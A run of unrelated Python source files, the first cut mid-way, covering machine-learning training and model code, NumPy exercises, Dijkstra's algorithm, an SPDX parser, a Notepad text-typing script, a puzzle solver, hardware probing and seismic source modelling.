training_accuracy = correct / len(train_loader.dataset)
return train_loss, training_accuracy
def eval_test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.cross_entropy(output, target, size_average=False).item()
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('Test: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
test_accuracy = correct / len(test_loader.dataset)
return test_loss, test_accuracy
def adjust_learning_rate(optimizer, epoch):
"""decrease the learning rate"""
lr = args.lr
if epoch >= 75:
lr = args.lr * 0.1
if epoch >= 90:
lr = args.lr * 0.01
if epoch >= 100:
lr = args.lr * 0.001
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def main():
# init model, ResNet18() can be also used here for training
model = WideResNet().to(device)
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
x_advs = []
for epoch in range(1, args.epochs + 1):
# adjust learning rate for SGD
adjust_learning_rate(optimizer, epoch)
# adversarial training
x_advs = train(args, model, device, train_loader, optimizer, epoch, x_advs, perturb_prob=0.25)
# evaluation on natural examples
print('================================================================')
eval_train(model, device, train_loader)
eval_test(model, device, test_loader)
print('================================================================')
# save checkpoint
if epoch % args.save_freq == 0:
torch.save(model.state_dict(),
os.path.join(model_dir, 'model-wideres-epoch{}.pt'.format(epoch)))
torch.save(optimizer.state_dict(),
os.path.join(model_dir, 'opt-wideres-checkpoint_epoch{}.tar'.format(epoch)))
if __name__ == '__main__':
main()
|
# day 5 Numpy
import numpy as np
def introduction():
print('Numpy Version', np.__version__)
def array_operation():
np.random.seed(0) # seed for reproducibility
x1 = np.random.randint(10, size=6) # One-dimensional array
x2 = np.random.randint(10, size=(3, 4)) # Two-dimensional array
x3 = np.random.randint(10, size=(3, 4, 5)) # Three-dimensional array
print("x3 ndim: ", x3.ndim)
print("x3 shape:", x3.shape)
print("x3 size: ", x3.size)
print("dtype:", x3.dtype)
print("itemsize:", x3.itemsize, "bytes")
print("nbytes:", x3.nbytes, "bytes")
print('X1', x1)
print('x1[0]', x1[0])
print('x1[-1]', x1[-1])
print('x2', x2)
print('x2[0,0]', x2[0, 0])
print('x2[1,-1]', x2[1, -1])
x2[0, 0] = 12
print('x2', x2)
def array_sub():
x = np.arange(10)
print('x', x)
print('x[:5]', x[:5])
print('x[5:]', x[5:])
print('x[3:5]', x[3:5])
print('x[::2]', x[::2])
print('x[1::2]', x[1::2])
print('x[::-1]', x[::-1])
print('x[5::-2]', x[5::-2])
x2 = np.random.randint(10, size=(3, 4))
print('x2', x2)
print('x2[:2, :3]', x2[:2, :3]) # 2x3
print('x2[:3, ::2]', x2[:3, ::2])
print('x2[::-1, ::-1]', x2[::-1, ::-1])
print('x2[:, 0]', x2[:, 0]) # first column of x2
print('x2[0, :]', x2[0, :]) # first row of x2
print(x2[0], x2[0]) # equivalent to x2[0, :]
x2_sub = x2[:2, :2]
print('sub, x2[0, :]', x2_sub)
x2_sub[0, 0] = 99
print(x2_sub)
print('x2', x2) # Sub arrays as no-copy views
x2_sub_copy = x2[:2, :2].copy() # Creating copies of arrays
print(x2_sub_copy)
def array_reshape():
x = np.array([1, 2, 3])
print('x', x)
reshape1 = x.reshape(1, 3)
reshape2 = x[np.newaxis, :]
reshape3 = x.reshape(3, 1)
reshape4 = x[:, np.newaxis]
print('reshape', reshape1)
print('newaxis', reshape2)
print('reshape', reshape3)
print('newaxis', reshape4)
x[2] = 999
print('reshape', reshape1)
print('newaxis', reshape2)
print('reshape', reshape3)
print('newaxis', reshape4)
def concat_split():
x = np.array([1, 2, 3])
y = np.array([3, 2, 1])
con1 = np.concatenate([x, y])
print('concatenate([x,y])', con1)
z = np.array([99, 99, 99])
con2 = np.concatenate([x, y, z])
print('concatenate([x, y, z])', con2)
grid = np.array([[1, 2, 3],
[4, 5, 6]])
con3 = np.concatenate([grid, grid])
print('2 dims concatenate([x, y])', con3)
con4 = np.concatenate([grid, grid], axis=1)
print('2 dims concatenate([x, y,axis=1])', con4)
x = np.array([9, 9, 9])
grid = np.array([[1, 1, 1],
[1, 1, 1]])
con5 = np.vstack([x, grid])
print('mix dims vstack([x, y])', con5)
y = np.array([[99],
[99]])
con6 = np.hstack([grid, y])
print('mix dims hstack([x, y])', con6)
x = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
x1, x2, x3 = np.split(x, [1, 2])
print('split', x1, x2, x3)
grid = np.arange(16).reshape((4, 4))
print('2dim split', x1, x2)
up, down = np.vsplit(grid, [2])
print(up)
print(down)
left, right = np.hsplit(grid, [2])
print(left)
print(right)
if __name__ == '__main__':
# introduction()
# array_operation()
# array_reshape()
concat_split()
|
# -*- coding: utf-8 -*-
"""
@date: 2021/2/23 8:22 PM
@file: fashionmnist.py
@author: zj
@description:
"""
from torch.utils.data import Dataset
import torchvision.datasets as datasets
from zcls.data.datasets.util import default_converter
# from zcls.data.datasets.evaluator.general_evaluator import GeneralEvaluator
from .evaluator.verification_evaluator import VerificationEvaluator
class FashionMNIST(Dataset):
def __init__(self, root, train=True, transform=None, target_transform=None, top_k=(1, 5)):
self.data_set = datasets.FashionMNIST(root, train=train, download=True)
self.targets = self.data_set.targets
self.classes = self.data_set.classes
self.root = root
self.transform = transform
self.target_transform = target_transform
self._update_evaluator(top_k)
def __getitem__(self, index: int):
image, target = self.data_set.__getitem__(index)
image = default_converter(image, rgb=False)
if self.transform is not None:
image = self.transform(image)
if self.target_transform is not None:
target = self.target_transform(target)
return image, target
def __len__(self) -> int:
return self.data_set.__len__()
def _update_evaluator(self, top_k):
# self.evaluator = GeneralEvaluator(self.classes, top_k=top_k)
self.evaluator = VerificationEvaluator()
def __repr__(self):
return self.__class__.__name__ + ' (' + self.root + ')'
|
from bsm.loader import load_common
class Base(object):
def __init__(self, config, env):
self._config = config
self._env = env
class OperationError(Exception):
pass
class Operation(object):
def __init__(self, config, env):
self.__config = config
self.__env = env
def execute(self, op_name, *args, **kargs):
try:
op = load_common(op_name, 'bsm.operation')(self.__config, self.__env)
except Exception as e:
raise OperationError('Can not load operation "{0}": {1}'.format(op_name, e))
return op.execute(*args, **kargs)
|
import sys
import torch
import torch.nn.functional as F
# import utils
class Net(torch.nn.Module):
def __init__(self,inputsize,taskcla, unitN = 400, split = False, notMNIST = False):
super(Net,self).__init__()
ncha,size,_=inputsize
self.notMNIST = notMNIST
if notMNIST:
unitN = 150
self.taskcla=taskcla
self.split = split
self.relu=torch.nn.ReLU()
self.drop=torch.nn.Dropout(0.5)
self.fc1=torch.nn.Linear(ncha*size*size,unitN)
self.fc2=torch.nn.Linear(unitN,unitN)
if notMNIST:
self.fc3=torch.nn.Linear(unitN,unitN)
self.fc4=torch.nn.Linear(unitN,unitN)
if split:
self.last=torch.nn.ModuleList()
for t,n in self.taskcla:
self.last.append(torch.nn.Linear(unitN,n))
else:
self.fc3=torch.nn.Linear(unitN,taskcla[0][1])
def forward(self,x):
h=x.view(x.size(0),-1)
h=self.drop(F.relu(self.fc1(h)))
h=self.drop(F.relu(self.fc2(h)))
if self.notMNIST:
h=self.drop(F.relu(self.fc3(h)))
h=self.drop(F.relu(self.fc4(h)))
if self.split:
y = []
for t,i in self.taskcla:
y.append(self.last[t](h))
else:
y = self.fc3(h)
return y
# import sys
# import torch
# import torch.nn.functional as F
# # import utils
# class Net(torch.nn.Module):
# def __init__(self,inputsize,taskcla, unitN = 400, split = False, notMNIST = False):
# super(Net,self).__init__()
# ncha,size,_=inputsize
# self.taskcla=taskcla
# self.split = split
# self.relu=torch.nn.ReLU()
# self.drop=torch.nn.Dropout(0.5)
# self.fc1=torch.nn.Linear(ncha*size*size,unitN)
# self.fc2=torch.nn.Linear(unitN,unitN)
# self.l=torch.nn.Linear(unitN,taskcla[0][1])
# if notMNIST:
# self.fc3=torch.nn.Linear(unitN,unitN)
# self.fc4=torch.nn.Linear(unitN,unitN)
# if split:
# self.last=torch.nn.ModuleList()
# for t,n in self.taskcla:
# self.last.append(torch.nn.Linear(unitN,n))
# def forward(self,x):
# h=x.view(x.size(0),-1)
# h=self.drop(F.relu(self.fc1(h)))
# h=self.drop(F.relu(self.fc2(h)))
# if self.split:
# for t,i in self.taskcla:
# y = []
# y.append(self.last[t](h))
# else:
# y = self.l(h)
# y = F.log_softmax(y, dim=1)
# return y
|
import numpy as np
import pandas as pd
filename = {"data1": "GSE71858.npy", #
"data2": "GSE60361.npy", #
"data3": "GSE71585.npy",
"data4": "GSE62270.npy", #
"data5": "GSE48968.npy", #
"data6": "GSE52529.npy", #
"data7": "GSE77564.npy",
"data8": "GSE78779.npy", #
"data9": "GSE10247.npy", #
"data10": "GSE69405.npy"}
#for _, f_name in filename.items():
# if f_name[-3:] == "txt":
# _file = pd.read_table(f_name, sep='\s+', index_col=False)
# else:
# _file = pd.read_csv(f_name, index_col=False)
# _file_t = np.array(_file)
# _file_t = np.delete(_file_t, 0, 1)
# file_t = np.around(_file_t.astype(np.float), decimals=7)
# np.savetxt(f_name[0:8] + '.txt', _file_t)
#np.save(f_name[0:8] + ".npy", _file_t)
#print np.loadtxt(f_name[0:7] + '.txt').shape
for f_key, f_name in filename.items():
data = np.load("./Data/"+f_name)
print f_key, data.shape
|
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import functools
def new_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def new_biases(length):
return tf.Variable(tf.constant(0.05, shape=[length]))
def new_conv_layer(input, num_input_channels, filter_size, num_filters, use_pooling=False):
shape = [filter_size, filter_size, num_input_channels, num_filters]
weights = new_weights(shape=shape)
biases = new_biases(length=num_filters)
layer = tf.nn.conv2d(input=input,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
layer += biases
if use_pooling:
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
layer = tf.nn.relu(layer)
return layer, weights
class CNNSRModel:
def __init__(self, x, y):
self.x = x
self.y = y
def _placeholder(self):
pass
def kernel(self):
        layer_conv1, weights_conv1 = new_conv_layer(input=self.x, num_input_channels=3, filter_size=5, num_filters=64)
        layer_conv2, weights_conv2 = new_conv_layer(input=layer_conv1, num_input_channels=64, filter_size=1,
                                                    num_filters=16)
        layer_conv3, weights_conv3 = new_conv_layer(input=layer_conv2, num_input_channels=16, filter_size=5,
                                                    num_filters=3)
        return [layer_conv1, layer_conv2, layer_conv3], [weights_conv1, weights_conv2, weights_conv3]
|
from time import ctime
from torbjorn.version import VERSION
def run():
cur_time = ctime()
text = f"""
# Torbjorn
Version {VERSION} ({cur_time} +0800)
"""
print(text)
|
def dijkstra(vertices, arestas, inicial, final):
visitados = set()
parente = dict()
nao_visitados = set({inicial})
distancias = {inicial:0}
while len(nao_visitados) > 0:
atual = min([(distancias[no],no) for no in nao_visitados])[1]
        if atual == final:  # shortest path to the destination has already been found
break
visitados.add(atual)
nao_visitados.remove(atual)
atual_arestas = arestas[atual]
vizinhos = []
for x in range(len(atual_arestas)):
if not atual_arestas[x][0] in visitados:
vizinhos.append(atual_arestas[x])
for vizinho in vizinhos:
distancia = distancias[atual] + vizinho[1]
if distancia < distancias.get(vizinho[0], float('inf')):
distancias[vizinho[0]] = distancia
parente[vizinho[0]] = atual
nao_visitados.add(vizinho[0])
return distancias[final]
def main():
entrada = input()
(qtd_vertices,qtd_arestas) = map(int,entrada.split())
vertices = list(range(qtd_vertices))
arestas = {}
for i in range(qtd_arestas):
entrada = input()
(origem,destino,peso) = map(int, entrada.split())
if origem in arestas:
arestas[origem].append((destino,peso))
else:
arestas[origem] = [(destino,peso)]
resultado = dijkstra(vertices,arestas,0,len(vertices)-1)
print(resultado)
if __name__ == '__main__':
main()
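# Example session (values made up for illustration): feeding the input below on
# stdin prints 7, the cost of the shortest path from vertex 0 to vertex 3
# (0 -> 1 -> 3 and 0 -> 2 -> 3 both cost 7).
#   4 4
#   0 1 3
#   0 2 5
#   1 3 4
#   2 3 2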
|
# Copyright (c) Xavier Figueroa
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
from spdx.parsers import jsonyamlxml
class Parser(jsonyamlxml.Parser):
"""
Wrapper class for jsonyamlxml.Parser to provide an interface similar to
RDF and TV Parser classes (i.e., spdx.parsers.<format name>.Parser) for YAML parser.
It also avoids to repeat jsonyamlxml.Parser.parse code for JSON, YAML and XML parsers
"""
def __init__(self, builder, logger):
super(Parser, self).__init__(builder, logger)
def parse(self, file):
self.document_object = yaml.safe_load(file).get("Document")
return super(Parser, self).parse()
|
# -*- coding: utf-8 -*-
import sys
import os
import datetime
import time
import codecs
import ctypes
import array
WM_CHAR = 0x0102
def enum_child_windows_proc(handle, list):
list.append(handle)
return 1
qLogNow=datetime.datetime.now()
qLogFlie = 'temp/_log/' + qLogNow.strftime('%Y%m%d-%H%M%S') + '_' + os.path.basename(__file__) + '.log'
def qLogOutput(pLogText='', pDisplay=False, pOutfile=True):
#try:
if (pDisplay == True):
print(str(pLogText))
if (pOutfile == True):
w = codecs.open(qLogFlie, 'a', 'utf-8')
w.write(str(pLogText) + '\n')
w.close()
w = None
#except:
#pass
if __name__ == "__main__":
qLogOutput('___main___:init')
qLogOutput('___main___:exsample.py txtFile, winTitle ')
txtFile = '_speech_a3_sendmessage.py'
winTitle = u'無題 - メモ帳'
if (len(sys.argv) >= 2):
txtFile = sys.argv[1]
if (len(sys.argv) >= 3):
winTitle = sys.argv[2]
qLogOutput('')
qLogOutput('___main___:txtFile =' + str(txtFile ))
qLogOutput('___main___:winTitle =' + str(winTitle ))
parent_handle = ctypes.windll.user32.FindWindowW(0, winTitle)
if (parent_handle == 0):
#qLogOutput('winTitle "' + winTitle + '" is not found !', True)
qLogOutput('winTitle "' + winTitle + '" is not found !')
else:
child_handles = array.array('i')
ENUM_CHILD_WINDOWS = ctypes.WINFUNCTYPE( \
ctypes.c_int, \
ctypes.c_int, \
ctypes.py_object)
ctypes.windll.user32.EnumChildWindows( \
parent_handle, \
ENUM_CHILD_WINDOWS(enum_child_windows_proc), \
ctypes.py_object(child_handles) )
try:
rt = codecs.open(txtFile, 'r', 'utf-8')
for txt in rt:
txt = txt.replace('\r', '')
txt = txt.replace('\n', '')
txt += '\n'
for i in range(len(txt)):
ctypes.windll.user32.SendMessageW(child_handles[0], WM_CHAR, (ord(txt[i])), 0)
            rt.close()
rt = None
except:
rt = None
qLogOutput('___main___:terminate')
qLogOutput('___main___:bye!')
|
code = '''UDRLRRRUULUUDULRULUDRDRURLLDUUDURLUUUDRRRLUUDRUUDDDRRRLRURLLLDDDRDDRUDDULUULDDUDRUUUDLRLLRLDUDUUUUDLDULLLDRLRLRULDDDDDLULURUDURDDLLRDLUDRRULDURDDLUDLLRRUDRUDDDLLURULRDDDRDRRLLUUDDLLLLRLRUULRDRURRRLLLLDULDDLRRRRUDRDULLLDDRRRDLRLRRRLDRULDUDDLDLUULRDDULRDRURRURLDULRUUDUUURDRLDDDURLDURLDUDURRLLLLRDDLDRUURURRRRDRRDLUULLURRDLLLDLDUUUDRDRULULRULUUDDULDUURRLRLRRDULDULDRUUDLLUDLLLLUDDULDLLDLLURLLLRUDRDLRUDLULDLLLUDRLRLUDLDRDURDDULDURLLRRRDUUDLRDDRUUDLUURLDRRRRRLDDUUDRURUDLLLRRULLRLDRUURRRRRLRLLUDDRLUDRRDUDUUUDRUDULRRULRDRRRDDRLUUUDRLLURURRLLDUDRUURDLRURLLRDUDUUDLLLUULLRULRLDLRDDDU
DRRRDRUDRLDUUDLLLRLULLLUURLLRLDRLURDRDRDRLDUUULDRDDLDDDURURUDRUUURDRDURLRLUDRRRDURDRRRDULLRDRRLUUUURLRUULRRDUDDDDUURLDULUDLLLRULUDUURRDUULRRDDURLURRUDRDRLDLRLLULULURLRDLRRRUUURDDUUURDRDRUURUDLULDRDDULLLLLRLRLLUDDLULLUDDLRLRDLDULURDUDULRDDRLUDUUDUDRLLDRRLLDULLRLDURUDRLRRRDULUUUULRRLUDDDLDUUDULLUUURDRLLULRLDLLUUDLLUULUULUDLRRDDRLUUULDDRULDRLURUURDLURDDRULLLLDUDULUDURRDRLDDRRLRURLLRLLLLDURDLUULDLDDLULLLRDRRRDLLLUUDDDLDRRLUUUUUULDRULLLDUDLDLURLDUDULRRRULDLRRDRUUUUUURRDRUURLDDURDUURURULULLURLLLLUURDUDRRLRRLRLRRRRRULLDLLLRURRDULLDLLULLRDUULDUDUDULDURLRDLDRUUURLLDLLUUDURURUD
UDUUUUURUDLLLRRRDRDRUDDRLLDRRLDRLLUURRULUULULRLLRUDDRLDRLUURDUDLURUULLLULLRRRULRLURRDDULLULULRUDDDUURDRLUDUURRRRUUULLRULLLDLURUDLDDLLRRRULDLLUURDRRRDRDURURLRUDLDLURDDRLLLUUDRUULLDLLLLUUDRRURLDDUDULUDLDURDLURUURDUUUURDLLLRUUURDUUUDLDUDDLUDDUDUDUDLDUDUUULDULUURDDLRRRULLUDRRDLUDULDURUURULLLLUDDDLURURLRLRDLRULRLULURRLLRDUDUDRULLRULRUDLURUDLLDUDLRDRLRDURURRULLDDLRLDDRLRDRRDLRDDLLLLDUURRULLRLLDDLDLURLRLLDULRURRRRDULRLRURURRULULDUURRDLURRDDLDLLLRULRLLURLRLLDDLRUDDDULDLDLRLURRULRRLULUDLDUDUDDLLUURDDDLULURRULDRRDDDUUURLLDRDURUDRUDLLDRUD
ULRDULURRDDLULLDDLDDDRLDUURDLLDRRRDLLURDRUDDLDURUDRULRULRULULUULLLLDRLRLDRLLLLLRLRRLRLRRRDDULRRLUDLURLLRLLURDDRRDRUUUDLDLDRRRUDLRUDDRURRDUUUDUUULRLDDRDRDRULRLLDLDDLLRLUDLLLLUURLDLRUDRLRDRDRLRULRDDURRLRUDLRLRLDRUDURLRDLDULLUUULDRLRDDRDUDLLRUDDUDURRRRDLDURRUURDUULLDLRDUDDLUDDDRRRULRLULDRLDDRUURURLRRRURDURDRULLUUDURUDRDRLDLURDDDUDDURUDLRULULURRUULDRLDULRRRRDUULLRRRRLUDLRDDRLRUDLURRRDRDRLLLULLUULRDULRDLDUURRDULLRULRLRRURDDLDLLRUUDLRLDLRUUDLDDLLULDLUURRRLRDULRLRLDRLDUDURRRLLRUUDLUURRDLDDULDLULUUUUDRRULLLLLLUULDRULDLRUDDDRDRDDURUURLURRDLDDRUURULLULUUUDDLRDULDDLULDUDRU
LRLRLRLLLRRLUULDDUUUURDULLLRURLDLDRURRRUUDDDULURDRRDURLRLUDLLULDRULLRRRDUUDDRDRULLDDULLLUURDLRLRUURRRLRDLDUDLLRLLURLRLLLDDDULUDUDRDLRRLUDDLRDDURRDRDUUULLUURURLRRDUURLRDLLUDURLRDRLURUURDRLULLUUUURRDDULDDDRULURUULLUDDDDLRURDLLDRURDUDRRLRLDLRRDDRRDDRUDRDLUDDDLUDLUDLRUDDUDRUDLLRURDLRUULRUURULUURLRDULDLDLLRDRDUDDDULRLDDDRDUDDRRRLRRLLRRRUUURRLDLLDRRDLULUUURUDLULDULLLDLULRLRDLDDDDDDDLRDRDUDLDLRLUDRRDRRDRUURDUDLDDLUDDDDDDRUURURUURLURLDULUDDLDDLRUUUULRDRLUDLDDLLLRLLDRRULULRLRDURRRLDDRDDRLU'''.split("\n")
#keypad like
# 1 2 3
# 4 5 6
# 7 8 9
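# For example, starting from 5 a line beginning "ULL" walks 5 -> 2 -> 1 and then
# stays on 1, because moves that would leave the pad map to None and are skipped
# by the loop below.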
keypad = {
1: {"U": None, "D": 4, "L": None, "R": 2},
2: {"U": None, "D": 5, "L": 1, "R": 3},
3: {"U": None, "D": 6, "L": 2, "R": None},
4: {"U": 1, "D": 7, "L": None, "R": 5},
5: {"U": 2, "D": 8, "L": 4, "R": 6},
6: {"U": 3, "D": 9, "L": 5, "R": None},
7: {"U": 4, "D": None, "L": None, "R": 8},
8: {"U": 5, "D": None, "L": 7, "R": 9},
9: {"U": 6, "D": None, "L": 8, "R": None}
}
current = 5
secret_input = ""
for line in code:
for move in line:
if keypad[current][move]:
current = keypad[current][move]
secret_input += str(current)
print("Secret keypad code: ", secret_input)
|
import ovl
target_filters = [ovl.percent_area_filter(min_area=0.005),
ovl.circle_filter(min_area_ratio=0.7),
ovl.area_sort()]
threshold = YELLOW_HSV = ovl.Color([20, 100, 100], [55, 255, 255])
yellow_circle = ovl.Vision(threshold=threshold,
target_filters=target_filters,
camera=0, # open the first connected camera
image_filters=[ovl.gaussian_blur()])
while True:
image = yellow_circle.get_image()
targets, filtered_image = yellow_circle.detect(image)
directions = yellow_circle.get_directions(targets, filtered_image)
print(directions) # prints out the (x, y) coordinates of the largest target
|
# C1C Matt Grimm
# Nov 15
# USAFA
import threading
from threading import Thread
import RPi.GPIO as GPIO
import spidev
import time
# This is my attempt at trying to analyze multiple signals at once on the same
# Raspberry Pi Board. It's a low resource "logic analyzer", or I'd like to think so.
def xmit():
for x in range(100):
xfer_read.append(spi.xfer([0x07]))
print(spi.xfer([0x07]))
# I believe the resultant from this print is something about the
# MISO + MOSI readings combining (look at component sheet to see how it's
# a little strange, which is why I would like to try to use a logic analyzer
# to know exactly what I am getting)
print("working\n")
# See results matched.
for q in range(100):
print(xfer_read[q],end ="")
def csn():
for y in range(100):
gpio_read.append(GPIO.input(8))
print(GPIO.input(8)) # Maybe messes with SPI layout; putting GPIO on top of SPI?
print("WORKING\n")
# See results. To mix up formatting of display, use time.sleep's and add/omit end='' at the end of print function.
time.sleep(1.25)
print("\n")
for z in range(100):
#print(gpio_read[z], end = "")
print(gpio_read[z], end = "")
if __name__ == '__main__': # !!This helps with using threads if I declare a "main" to run.
gpio_read =[]
xfer_read=[]
GPIO.setmode(GPIO.BCM)
GPIO.setup(8,GPIO.IN) # SPI0 CE0 (I think this fluctuates depending on input which is why I am trying to test it.)
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz = 7629
# a = Thread(target=func1).start()
# b = Thread(target=func2).start()
# Pretty sure threads here run concurrently. Processes probably run simultaneously.
# Could use semaphores to disallow threads to use same resources at same time.
# I think they still do internal calculating while waiting though...would have to
# experiment/check.
    a = threading.Thread(target=xmit)
    b = threading.Thread(target=csn)
    a.start()
    b.start()
    a.join()
    b.join()
# Make lists global somehow to better format results through grouping??
print("Closed")
# 0 1 0 0 1 0 1 0 0 1 0 1 0 0 1 0 1 0 0 1 0 1 0 0
# SYNCED (What do these numbers mean??)
#[0][14][12][0][14][0][8][14][0][14][0][8][14][0][14][0][8]
# MORE RESULTS WHEN RUNNING THE PROGRAM!!
#[#] numbers are from printing the spi transfer. My previous experience has
# told me this shows what is going through MISO.
# Looking at nRF24L01 wireless transmitter datasheet, GPIO.input(intended CSN) should be low at all times.
# May look into switching this functionality over to a GPIO instead of SPI Chip Enable.
# Just to note my wiring setup, I am connecting one wireless transmitter nRF24L01
# using an SPI layout. SPI0 MOSI/MISO and SPI0 CE0 for CSN and BCM23 for CE. 3.3V for VCC.
# Honestly, you could probably switch the GPIO pin number to whatever necessary in testing.
# Was trying to send a read signal to MOSI to get a status register response from MISO.
# See https://www.sparkfun.com/datasheets/Components/SMD/nRF24L01Pluss_Preliminary_Product_Specification_v1_0.pdf
# Pg 56 and 49
# --== OUTPUT EXAMPLE ==--
# [0][0][0][0][14][0][14][0][14][0][0][12][0][14][0][14][0][12][8][0][14]
#[0][14][0][8][12][0][14][0][14][0][14][0][8][12][0][14][0][14][0][0][14]
#[0][14][0][0][14][0][14][0][0][14][0][14][0][0][14][0][14][0][14][8][0]
#[14][0][8][14][0][14][0][0][14][0][14][0][0][14][0][14][0][0][14][0][14]
#[0][0][14][0][14][0][14][0][14][0][14][0][14][0][0][0]
# 1010101001010100101010010101010010101001010010100101001010110101101001010010
# 100101001010010101101000
|
#!/usr/bin/env python
# coding: utf-8
# Sets up the source description (both single force and moment) from results of conduit flow model
# In[2]:
import numpy as np
import gc
# In[ ]:
def time_height(time, dt, height, cushion=4000):
'''
takes the time and height arrays from conduit flow simulation and
puts in form for calculations to fit
NB: - cushion is adding time points prior to simulation start (to eliminate some
edge effects from fourier transform)
- relabelling positions along conduit so that z=0 is the top
'''
NN = len(time)
t = np.arange(-cushion, NN) * dt
t[cushion:] = time
z = -(height - max(height)*np.ones(len(height)))
return t, z
# In[3]:
def equivforce_per_unitvolume(time, density_vel):
'''
returns the equivalent single force per unit volume acting on surrounding earth
(positive -> upwards)
(based off of methods in Sec 4, Takei & Kumazawa 1993)
density_vel : (# grid points, # time points)
df_dV : (# grid points, # time points)
'''
dim = density_vel.shape
df_dV = np.zeros(dim, dtype='float')
# d(rho * v)/dt
df_dV += - np.gradient(density_vel, time, axis=1)
return df_dV
# In[ ]:
def singleforce_density(density_vel, time, area, cushion=4000):
'''
returns dforce/dz time series for each point along conduit with added
cushion at the beginning, given rho_v time series for each point
NB: returns the change in dforce/dz from the initial value (looking at deviations
from original equilibrium state)
(positive -> upwards : ACTING ON SURROUNDING EARTH)
density_vel : (# grid points, # OG time points) : rho*v time series at each grid point
time : (# OG time points + cushion) : cushioned time points
area : (1) : conduit cross-sectional area
cushion : (1) : # time points of constant cushion
'''
HH = np.ma.size(density_vel, axis=0)
NN_og = np.ma.size(density_vel, axis=1)
NN = NN_og + cushion
rho_v = np.zeros((HH, NN))
ones = np.ones(cushion)
for ii in range(HH):
if cushion != 0:
rho_v[ii,:cushion] = ones * density_vel[ii,0]
rho_v[ii,cushion:] = density_vel[ii,:]
gc.collect()
dforce_dz_true = area * equivforce_per_unitvolume(time, rho_v)
dforce_dz_initial = np.tile(dforce_dz_true[:,0], (NN, 1)).transpose()
dforce_dz = dforce_dz_true - dforce_dz_initial
gc.collect()
return dforce_dz
# In[1]:
def moment_tensor_cylindricalSource(mediumParams):
'''
returns the moment tensor for a cylindrical source oriented along the z-axis
NB: defined in cartesian basis
'''
lame, mu = mediumParams
moment_tensor = ((lame + 2*mu) / mu) * np.eye(3)
moment_tensor[2,2] = lame / mu
return moment_tensor
# In[2]:
def moment_density(pressure, area, cushion=4000):
'''
returns dmoment/dz time series for each point along conduit with added
cushion at the beginning, given pressure time series for each point
NB: returns the change in dmoment/dz from the initial value (looking at deviations
from original equilibrium state)
pressure : (# grid points, # OG time points) : pressure time series at each grid point
area : (1) : conduit cross-sectional area
cushion : (1) : # time points of constant cushion
'''
HH = np.ma.size(pressure, axis=0)
NN_og = np.ma.size(pressure, axis=1)
NN = NN_og + cushion
dp_cushion = np.zeros((HH, NN))
for ii in range(HH):
dp_cushion[ii, cushion:] = pressure[ii,:] - pressure[ii,0] * np.ones(NN_og)
gc.collect()
dmoment_dz = area * dp_cushion
return dmoment_dz
def cushioned_general_MT(moment_tensor, cushion=4000):
'''
returns general moment tensor time series with added cushion at the beginning
NB: - returns the change in moment_tensor from the initial value (looking at
deviations from original equilibrium state)
- single MT (i.e. no extended source consideration)
moment_tensor : (3, 3, # OG time points) : time series for a general moment tensor
cushion : (1) : # time points of constant cushion
'''
NN_og = np.ma.size(moment_tensor, axis=2)
NN = NN_og + cushion
dMT_cushion = np.zeros((3, 3, NN))
dMT_cushion[:,:,cushion:] = moment_tensor[:,:,:] - np.tile(moment_tensor[:,:,0:1], [1, 1, NN_og])
gc.collect()
return dMT_cushion
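# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Shows how the helpers above might be chained together. The array shapes, dt and
# cushion values below are assumptions made up for the example, not outputs of any
# real conduit flow simulation.
if __name__ == '__main__':
    n_grid, n_time, dt = 5, 50, 0.01
    sim_time = np.arange(n_time) * dt                 # simulated time axis
    sim_height = np.linspace(0.0, 100.0, n_grid)      # positions along the conduit
    t, z = time_height(sim_time, dt, sim_height, cushion=10)
    rho_v = np.random.rand(n_grid, n_time)            # stand-in for rho*v time series
    df_dz = singleforce_density(rho_v, t, area=1.0, cushion=10)
    print(df_dz.shape)                                # (n_grid, n_time + cushion)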
|
import unittest
from multiplicable_numbers import displays_detected_numbers
class TestDisplaysDetectedNumbers(unittest.TestCase):
def setUp(self):
self.one_to_a_hundred_with_three_and_five_multiplicables = [
'1', '2', 'Three', '4', 'Five', 'Three', '7', '8', 'Three', 'Five', '11', 'Three', '13', '14', 'ThreeFive',
'16', '17', 'Three', '19', 'Five', 'Three', '22', '23', 'Three', 'Five', '26', 'Three', '28', '29',
'ThreeFive', '31', '32', 'Three', '34', 'Five', 'Three', '37', '38', 'Three', 'Five', '41', 'Three', '43',
'44', 'ThreeFive', '46', '47', 'Three', '49', 'Five', 'Three', '52', '53', 'Three', 'Five', '56', 'Three',
'58', '59', 'ThreeFive', '61', '62', 'Three', '64', 'Five', 'Three', '67', '68', 'Three', 'Five', '71',
'Three', '73', '74', 'ThreeFive', '76', '77', 'Three', '79', 'Five', 'Three', '82', '83', 'Three', 'Five',
'86', 'Three', '88', '89', 'ThreeFive', '91', '92', 'Three', '94', 'Five', 'Three', '97', '98', 'Three',
'Five']
self.one_to_a_hundred_with_tow_and_four_multiplicables = [
'1', 'Two', '3', 'TwoFour', '5', 'Two', '7', 'TwoFour', '9', 'Two', '11', 'TwoFour', '13', 'Two', '15',
'TwoFour', '17', 'Two', '19', 'TwoFour', '21', 'Two', '23', 'TwoFour', '25', 'Two', '27', 'TwoFour', '29',
